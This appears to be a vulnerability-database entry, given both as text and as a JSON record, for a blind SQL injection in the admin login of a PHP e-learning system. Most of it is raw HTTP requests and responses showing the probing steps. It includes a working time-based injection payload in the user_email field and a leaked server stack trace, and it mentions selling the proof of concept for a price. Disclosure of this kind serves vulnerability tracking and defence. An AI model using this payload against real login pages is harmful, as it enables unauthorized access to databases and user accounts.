CVE-nu11-101821

2021-10-18T00:00:00

Description

## Description: The user_email parameter appears to be vulnerable to SQL injection attacks Time-based Blind. A single quote was submitted in the user_email parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. **Recent assessments:** **nu11secur1ty** at October 18, 2021 2:08pm UTC reported: ## [CVE-nu11-101821](<https://www.sourcecodester.com/php/12808/e-learning-system-using-phpmysqli.html>) ## [Vendor](<https://www.sourcecodester.com/user/51695/activity>) ![](https://raw.githubusercontent.com/nu11secur1ty/CVE-nu11secur1ty/main/vendors/janobe/CVE-nu11-101821/docs/Screenshot%202021-10-18%20140507.png) ## MySQL Request-1: POST /caiwl/admin/login.php HTTP/1.1 Host: 192.168.1.4 Origin: http://192.168.1.4 Cookie: PHPSESSID=8qen88airh7u0ai06ijhk96a21 Upgrade-Insecure-Requests: 1 Referer: http://192.168.1.4/caiwl/admin/login.php Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en-US,en-GB;q=0.9,en;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Connection: close Cache-Control: max-age=0 Content-Length: 90 user_email=IlZWXHcK@nu11secur1tycollaborator.net'&user_pass=m2G%21b5m%21D8&btnLogin=%C2%9E%C3%A9e ## MySQL Response-1: Response 1 HTTP/1.1 200 OK Date: Mon, 18 Oct 2021 07:42:37 GMT Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/7.4.24 X-Powered-By: PHP/7.4.24 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Content-Length: 7099 Connection: close Content-Type: text/html; charset=UTF-8  <!DOCTYPE html> <html lang="en"> <head> <title>Login V18</title> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initi ...[SNIP]... Fatal error: Uncaught Error: Call to undefined function mysql_error() in C:\xampp\htdocs\caiwl\include\accounts.php:28 Stack trace: #0 C:\xampp\htdocs\caiwl\admin\login.php(165): User::userAuthentication('IlZWXHcK@burpco...', '0314337dea4e6aa...') #1 {main} thrown in ...[SNIP]... * * * ## MySQL Request-2: POST /caiwl/admin/login.php HTTP/1.1 Host: 192.168.1.4 Origin: http://192.168.1.4 Cookie: PHPSESSID=8qen88airh7u0ai06ijhk96a21 Upgrade-Insecure-Requests: 1 Referer: http://192.168.1.4/caiwl/admin/login.php Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en-US,en-GB;q=0.9,en;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Connection: close Cache-Control: max-age=0 Content-Length: 90 user_email=ICpueGIm@nu11secur1tycollaborator.net''&user_pass=g1M%21g9l%21F1&btnLogin=%C2%9E%C3%A9e ## MySQL Response-2 HTTP/1.1 200 OK Date: Mon, 18 Oct 2021 07:42:40 GMT Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/7.4.24 X-Powered-By: PHP/7.4.24 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Content-Length: 6832 Connection: close Content-Type: text/html; charset=UTF-8  <!DOCTYPE html> <html lang="en"> <head> <title>Login V18</title> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initi ...[SNIP]... ## MySQL Request-3 POST /caiwl/admin/login.php HTTP/1.1 Host: 192.168.1.4 Origin: http://192.168.1.4 Cookie: PHPSESSID=8qen88airh7u0ai06ijhk96a21 Upgrade-Insecure-Requests: 1 Referer: http://192.168.1.4/caiwl/admin/login.php Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en-US,en-GB;q=0.9,en;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Connection: close Cache-Control: max-age=0 Content-Length: 90 user_email=QXVzAYzI@nu11secur1tycollaborator.net'%2b(select*from(select(sleep(20)))a)%2b'&user_pass=u0U%21y2z%21D9&btnLogin=%C2%9E%C3%A9e ## MySQL Response-3 HTTP/1.1 200 OK Date: Mon, 18 Oct 2021 07:42:51 GMT Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/7.4.24 X-Powered-By: PHP/7.4.24 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Content-Length: 6811 Connection: close Content-Type: text/html; charset=UTF-8  <!DOCTYPE html> <html lang="en"> <head> <title>Login V18</title> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initi ...[SNIP]... ## Price for decrypting of the PoC: 4000$ ## Reproduce [href](<https://github.com/nu11secur1ty/CVE-nu11secur1ty/edit/main/vendors/janobe/CVE-nu11-101821>) ## Proof: [href](<https://streamable.com/f5tk43>) Assessed Attacker Value: 5 Assessed Attacker Value: 5Assessed Attacker Value: 5

{"id": "AKB:0B4D3ED3-FC04-45FE-B2D9-5E91FC41FAD2", "type": "attackerkb", "bulletinFamily": "info", "title": "CVE-nu11-101821", "description": "## Description:\n\nThe user_email parameter appears to be vulnerable to SQL injection attacks Time-based Blind. \nA single quote was submitted in the user_email parameter, and a general error message was returned. \nTwo single quotes were then submitted and the error message disappeared.\n\n \n**Recent assessments:** \n \n**nu11secur1ty** at October 18, 2021 2:08pm UTC reported:\n\n## [CVE-nu11-101821](<https://www.sourcecodester.com/php/12808/e-learning-system-using-phpmysqli.html>)\n\n## [Vendor](<https://www.sourcecodester.com/user/51695/activity>)\n\n![](https://raw.githubusercontent.com/nu11secur1ty/CVE-nu11secur1ty/main/vendors/janobe/CVE-nu11-101821/docs/Screenshot%202021-10-18%20140507.png)\n\n## MySQL Request-1:\n \n \n POST /caiwl/admin/login.php HTTP/1.1\n Host: 192.168.1.4\n Origin: http://192.168.1.4\n Cookie: PHPSESSID=8qen88airh7u0ai06ijhk96a21\n Upgrade-Insecure-Requests: 1\n Referer: http://192.168.1.4/caiwl/admin/login.php\n Content-Type: application/x-www-form-urlencoded\n Accept-Encoding: gzip, deflate\n Accept: */*\n Accept-Language: en-US,en-GB;q=0.9,en;q=0.8\n User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36\n Connection: close\n Cache-Control: max-age=0\n Content-Length: 90\n \n user_email=IlZWXHcK@nu11secur1tycollaborator.net'&user_pass=m2G%21b5m%21D8&btnLogin=%C2%9E%C3%A9e\n \n\n## MySQL Response-1:\n \n \n Response 1\n HTTP/1.1 200 OK\n Date: Mon, 18 Oct 2021 07:42:37 GMT\n Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/7.4.24\n X-Powered-By: PHP/7.4.24\n Expires: Thu, 19 Nov 1981 08:52:00 GMT\n Cache-Control: no-store, no-cache, must-revalidate\n Pragma: no-cache\n Content-Length: 7099\n Connection: close\n Content-Type: text/html; charset=UTF-8\n \n \n \n \n \n <!DOCTYPE html>\n <html lang=\"en\">\n <head>\n <title>Login V18</title>\n <meta charset=\"UTF-8\">\n <meta name=\"viewport\" content=\"width=device-width, initi\n ...[SNIP]...\n Fatal error: Uncaught Error: Call to undefined function mysql_error() in C:\\xampp\\htdocs\\caiwl\\include\\accounts.php:28\n Stack trace:\n #0 C:\\xampp\\htdocs\\caiwl\\admin\\login.php(165): User::userAuthentication('IlZWXHcK@burpco...', '0314337dea4e6aa...')\n #1 {main}\n thrown in \n ...[SNIP]...\n \n\n* * *\n\n## MySQL Request-2:\n \n \n POST /caiwl/admin/login.php HTTP/1.1\n Host: 192.168.1.4\n Origin: http://192.168.1.4\n Cookie: PHPSESSID=8qen88airh7u0ai06ijhk96a21\n Upgrade-Insecure-Requests: 1\n Referer: http://192.168.1.4/caiwl/admin/login.php\n Content-Type: application/x-www-form-urlencoded\n Accept-Encoding: gzip, deflate\n Accept: */*\n Accept-Language: en-US,en-GB;q=0.9,en;q=0.8\n User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36\n Connection: close\n Cache-Control: max-age=0\n Content-Length: 90\n \n user_email=ICpueGIm@nu11secur1tycollaborator.net''&user_pass=g1M%21g9l%21F1&btnLogin=%C2%9E%C3%A9e\n \n\n## MySQL Response-2\n \n \n HTTP/1.1 200 OK\n Date: Mon, 18 Oct 2021 07:42:40 GMT\n Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/7.4.24\n X-Powered-By: PHP/7.4.24\n Expires: Thu, 19 Nov 1981 08:52:00 GMT\n Cache-Control: no-store, no-cache, must-revalidate\n Pragma: no-cache\n Content-Length: 6832\n Connection: close\n Content-Type: text/html; charset=UTF-8\n \n \n \n \n \n <!DOCTYPE html>\n <html lang=\"en\">\n <head>\n <title>Login V18</title>\n <meta charset=\"UTF-8\">\n <meta name=\"viewport\" content=\"width=device-width, initi\n ...[SNIP]...\n \n\n## MySQL Request-3\n \n \n POST /caiwl/admin/login.php HTTP/1.1\n Host: 192.168.1.4\n Origin: http://192.168.1.4\n Cookie: PHPSESSID=8qen88airh7u0ai06ijhk96a21\n Upgrade-Insecure-Requests: 1\n Referer: http://192.168.1.4/caiwl/admin/login.php\n Content-Type: application/x-www-form-urlencoded\n Accept-Encoding: gzip, deflate\n Accept: */*\n Accept-Language: en-US,en-GB;q=0.9,en;q=0.8\n User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36\n Connection: close\n Cache-Control: max-age=0\n Content-Length: 90\n \n user_email=QXVzAYzI@nu11secur1tycollaborator.net'%2b(select*from(select(sleep(20)))a)%2b'&user_pass=u0U%21y2z%21D9&btnLogin=%C2%9E%C3%A9e\n \n\n## MySQL Response-3\n \n \n HTTP/1.1 200 OK\n Date: Mon, 18 Oct 2021 07:42:51 GMT\n Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/7.4.24\n X-Powered-By: PHP/7.4.24\n Expires: Thu, 19 Nov 1981 08:52:00 GMT\n Cache-Control: no-store, no-cache, must-revalidate\n Pragma: no-cache\n Content-Length: 6811\n Connection: close\n Content-Type: text/html; charset=UTF-8\n \n \n \n \n \n <!DOCTYPE html>\n <html lang=\"en\">\n <head>\n <title>Login V18</title>\n <meta charset=\"UTF-8\">\n <meta name=\"viewport\" content=\"width=device-width, initi\n ...[SNIP]...\n \n\n## Price for decrypting of the PoC:\n \n \n 4000$\n \n\n## Reproduce\n\n[href](<https://github.com/nu11secur1ty/CVE-nu11secur1ty/edit/main/vendors/janobe/CVE-nu11-101821>)\n\n## Proof:\n\n[href](<https://streamable.com/f5tk43>)\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "published": "2021-10-18T00:00:00", "modified": "2021-10-18T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://attackerkb.com/comments/317e73ba-fb04-49ff-8bf3-13feeb737102", "reporter": "AttackerKB", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2021-10-18T16:41:59", "viewCount": 8, "enchantments": {"dependencies": {}, "score": {"value": 0.3, "vector": "NONE"}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.3}, "attackerkb": {"attackerValue": 5, "exploitability": 5}, "wildExploited": false, "wildExploitedCategory": {}, "wildExploitedReports": [], "references_categories": {}, "tags": ["easy_to_develop", "high_privilege_access", "default_configuration"], "mitre_vector": {"Execution": ["Command and Scripting Interpreter: Python(Validated)", "Exploitation for Client Execution(Validated)"]}, "last_activity": "2021-10-18T14:34:00", "_state": {"wildexploited": 1647356733, "dependencies": 1646365306}, "_internal": {"wildexploited_cvelist": null}}